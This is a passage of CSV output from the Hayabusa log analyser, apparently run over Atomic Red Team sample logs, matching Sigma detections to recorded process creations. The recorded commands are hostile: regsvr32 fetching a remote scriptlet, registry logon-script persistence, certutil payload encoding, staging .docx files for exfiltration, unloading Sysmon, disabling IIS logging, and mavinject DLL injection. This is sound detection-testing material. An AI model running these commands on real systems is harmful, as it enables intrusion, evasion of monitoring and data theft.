192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll : Path: C:\Windows\SysWOW64\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:8 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" 
cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -encode c:\file.exe file.txt : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: 